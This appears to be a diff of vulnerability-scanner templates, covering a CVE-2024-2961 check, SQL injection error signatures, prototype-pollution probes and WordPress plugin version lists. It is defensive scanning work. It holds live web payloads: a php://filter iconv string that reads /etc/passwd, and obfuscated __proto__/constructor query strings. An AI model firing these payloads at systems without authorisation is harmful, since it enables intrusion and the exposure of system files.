- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
cvss-score: 7.3
cve-id: CVE-2024-2961
cwe-id: CWE-787
epss-score: 0.00046
epss-percentile: 0.17937
tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- '!regex("root:x:0:0", body)'
internal: true
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
- 'method == "POST"'
payloads:
phppayload:
- "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
stop-at-first-match: true
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{phppayload}}"
matchers:
- type: regex
regex:
- "root:x:0:0"
# digest: 490a0046304402201f6d53c56152da05568676ff081b4e2e54a240e9733b397876b4e3f10497e39102203ba4b712ba0835187d3ec4dd79552eb7021ee1d270b9763b8ff6bb5f3d2c2dbe:922c64590222798bb761d5b6d8e72950

11
dast/vulnerabilities/sqli/sqli-error-based.yaml
View File

@ -16,7 +16,7 @@ http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
- 'method != "OPTIONS"'
payloads:
injection:
@ -25,8 +25,9 @@ http:
- ";"
fuzzing:
- part: query
- part: request
type: postfix
mode: single
fuzz:
- "{{injection}}"
@ -143,7 +144,7 @@ http:
- "SQLite\\.Exception"
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
- "Warning.*?\\W(sqlite_|SQLite3::)"
- "\\[SQLITE_ERROR\\]"
- "SQLITE_ERROR"
- "SQLite error \\d+:"
- "sqlite3.OperationalError:"
- "SQLite3::SQLException"
@ -362,7 +363,7 @@ http:
- "SQLite\\.Exception"
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
- "Warning.*?\\W(sqlite_|SQLite3::)"
- "\\[SQLITE_ERROR\\]"
- "SQLITE_ERROR"
- "SQLite error \\d+:"
- "sqlite3.OperationalError:"
- "SQLite3::SQLException"
@ -493,4 +494,4 @@ http:
- "SQ200: No table "
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
# digest: 4a0a00473045022100def6b6c4c85fe7786b61273d67b03bdcee001f0c68a862eaefdb3b9683291467022016d745831a21fa1c90b37bd0b0557828da77cf36662ddec1898ee436d5990a38:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220312a2619a0bef4a0328b000b96cf09ecf42226ee9b872709c7a0be7b7816f656022007e96f4d42fb5ee12201d386a057c06a4c1f3f38e4264a6c2459ba1766d3d0e4:922c64590222798bb761d5b6d8e72950

5
dast/vulnerabilities/sqli/time-based-sqli.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time-based,blind
tags: time-based-sqli,sqli,dast,blind
flow: http(1) && http(2)
@ -19,6 +19,7 @@ http:
- type: dsl
dsl:
- "duration<=7"
internal: true
- raw:
- |
@ -47,4 +48,4 @@ http:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202529d892c477e15738b4e5537c797e61478cb79afff398f2dc90fca1769751960221009f10ae4d72053768a125dfa0aa2497b24e5150a453c8536c0cea34d4e5d4a5ae:922c64590222798bb761d5b6d8e72950

26
file/logs/aspnet-framework-exceptions.yaml Normal file
View File

@ -0,0 +1,26 @@
id: aspnet-framework-exceptions
info:
name: ASP.NET Framework Exceptions
author: Aayush Dhakal
severity: info
description: Detects suspicious ASP.NET framework exceptions that could indicate exploitation attempts
reference:
- https://docs.microsoft.com/en-us/dotnet/api/system.web.httpexception
tags: file,logs,aspnet
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'HttpException'
- 'InvalidOperationException'
- 'UnauthorizedAccessException'
- 'NotFound'
# digest: 4b0a00483046022100cce9d73fab909d76caea2c65a3380fce622826fcef40e508d010cb9e9424a611022100b030e1405d8ac4292be1476046196e86ad778a064c16f0830241260100f83001:922c64590222798bb761d5b6d8e72950

34
file/logs/nodejs-framework-exceptions.yaml Normal file
View File

@ -0,0 +1,34 @@
id: nodejs-framework-exceptions
info:
name: Node.js Framework Exceptions
author: Aayush Dhakal
severity: info
description: Detects suspicious Node.js framework exceptions that could indicate exploitation attempts
reference:
- https://expressjs.com/en/guide/error-handling.html
- https://nodejs.org/en/docs/guides
tags: file,logs,nodejs
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'TypeError'
- 'ReferenceError'
- 'SyntaxError'
- 'ValidationError'
- 'UnauthorizedError'
- 'ForbiddenError'
- 'NotFoundError'
- 'InternalServerError'
- 'BadRequestError'
- 'MongoError'
- 'SequelizeDatabaseError'
# digest: 490a0046304402200590371092e47ea55a6e54c717596bb644b66b2e5c3600605ef089aba8946ffa022070b2ff6d441b180cf27a7bea971c2238c8c5704280016daf5acbef415d8cb138:922c64590222798bb761d5b6d8e72950

90
headless/prototype-pollution-check.yaml
View File

@ -5,7 +5,8 @@ info:
author: pdteam
severity: medium
metadata:
max-request: 4
max-request: 8
verified: true
tags: headless
headless:
@ -17,7 +18,7 @@ headless:
- action: waitload
- action: script
name: extract
name: extract1
args:
code: |
() => {
@ -25,7 +26,7 @@ headless:
}
matchers:
- type: word
part: extract
part: extract1
words:
- "polluted"
@ -88,4 +89,85 @@ headless:
part: extract4
words:
- "polluted"
# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract5
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract5
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract6
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract6
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract7
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract7
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract8
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract8
words:
- "polluted"
# digest: 490a004630440220332d2eb43e6ee2b3b48ca3bd7b953693814ce81ca3c34fa2036bcbfc93482d6a02204efa7ecda7b863d46e7a42d80500a115097ba317b63547ed5c07a4124338dafc:922c64590222798bb761d5b6d8e72950

1
helpers/wordlists/wordpress-plugins.txt
View File

@ -12039,7 +12039,6 @@ burnmans-diaspora-button
burnmans-subjot-button
burnzone-commenting
burping-the-corpse-sidebar-widget
burst-statistics
burstn-for-wordpress
burstpay-woocommerce
bury-admin-bar

2
helpers/wordpress/plugins/advanced-custom-fields.txt
View File

@ -1 +1 @@
6.3.6.1
6.3.10.2

2
helpers/wordpress/plugins/all-in-one-seo-pack.txt
View File

@ -1 +1 @@
4.7.2
4.7.3.1

2
helpers/wordpress/plugins/all-in-one-wp-migration.txt
View File

@ -1 +1 @@
7.86
7.87

2
helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt
View File

@ -1 +1 @@
5.3.3
5.3.4

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
4.4.4
4.4.6

2
helpers/wordpress/plugins/backwpup.txt
View File

@ -1 +1 @@
4.1.5
4.1.6

2
helpers/wordpress/plugins/breeze.txt
View File

@ -1 +1 @@
2.1.15
2.1.18

2
helpers/wordpress/plugins/chaty.txt
View File

@ -1 +1 @@
3.3
3.3.1

2
helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt
View File

@ -1 +1 @@
4.10
4.12

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
7.1.0
7.1.4

2
helpers/wordpress/plugins/contact-form-cfdb7.txt
View File

@ -1 +1 @@
1.2.7
1.2.9

2
helpers/wordpress/plugins/cookie-law-info.txt
View File

@ -1 +1 @@
3.2.6
3.2.7

2
helpers/wordpress/plugins/disable-gutenberg.txt
View File

@ -1 +1 @@
3.2.1
3.2.2

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.24.6
3.25.3

2
helpers/wordpress/plugins/elementskit-lite.txt
View File

@ -1 +1 @@
3.2.8
3.3.1

2
helpers/wordpress/plugins/envato-elements.txt
View File

@ -1 +1 @@
2.0.14
2.0.15

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
6.0.7
6.0.8

2
helpers/wordpress/plugins/ewww-image-optimizer.txt
View File

@ -1 +1 @@
7.9.0
7.9.1

2
helpers/wordpress/plugins/fluent-smtp.txt
View File

@ -1 +1 @@
2.2.80
2.2.81

2
helpers/wordpress/plugins/formidable.txt
View File

@ -1 +1 @@
6.15
6.16

2
helpers/wordpress/plugins/forminator.txt
View File

@ -1 +1 @@
1.35.1
1.36.3

2
helpers/wordpress/plugins/ga-google-analytics.txt
View File

@ -1 +1 @@
20240820
20241102

2
helpers/wordpress/plugins/gdpr-cookie-compliance.txt
View File

@ -1 +1 @@
4.15.4
4.15.5

2
helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
View File

@ -1 +1 @@
8.1.0
8.2.1

2
helpers/wordpress/plugins/google-analytics-for-wordpress.txt
View File

@ -1 +1 @@
9.1.1
9.2.1

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.137.0
1.138.0

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
19.4.0
19.5.1

2
helpers/wordpress/plugins/happy-elementor-addons.txt
View File

@ -1 +1 @@
3.12.4
3.12.5

2
helpers/wordpress/plugins/header-footer-elementor.txt
View File

@ -1 +1 @@
1.6.42
1.6.45

2
helpers/wordpress/plugins/hostinger.txt
View File

@ -1 +1 @@
3.0.12
3.0.16

2
helpers/wordpress/plugins/insert-headers-and-footers.txt
View File

@ -1 +1 @@
2.2.2
2.2.3

2
helpers/wordpress/plugins/jetpack-boost.txt
View File

@ -1 +1 @@
3.5.1
3.5.2

2
helpers/wordpress/plugins/jetpack.txt
View File

@ -1 +1 @@
13.9
13.9.1

2
helpers/wordpress/plugins/kadence-blocks.txt
View File

@ -1 +1 @@
3.3.1
3.3.3

2
helpers/wordpress/plugins/leadin.txt
View File

@ -1 +1 @@
11.1.65
11.1.66

2
helpers/wordpress/plugins/limit-login-attempts-reloaded.txt
View File

@ -1 +1 @@
2.26.13
2.26.14

2
helpers/wordpress/plugins/litespeed-cache.txt
View File

@ -1 +1 @@
6.5.1
6.5.2

2
helpers/wordpress/plugins/loginizer.txt
View File

@ -1 +1 @@
1.9.2
1.9.3

2
helpers/wordpress/plugins/mailchimp-for-wp.txt
View File

@ -1 +1 @@
4.9.17
4.9.18

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
5.3.0
5.3.5

2
helpers/wordpress/plugins/maintenance.txt
View File

@ -1 +1 @@
4.12
4.15

2
helpers/wordpress/plugins/malcare-security.txt
View File

@ -1 +1 @@
5.77
5.81

2
helpers/wordpress/plugins/meta-box.txt
View File

@ -1 +1 @@
5.10.2
5.10.3

Some files were not shown because too many files have changed in this diff Show More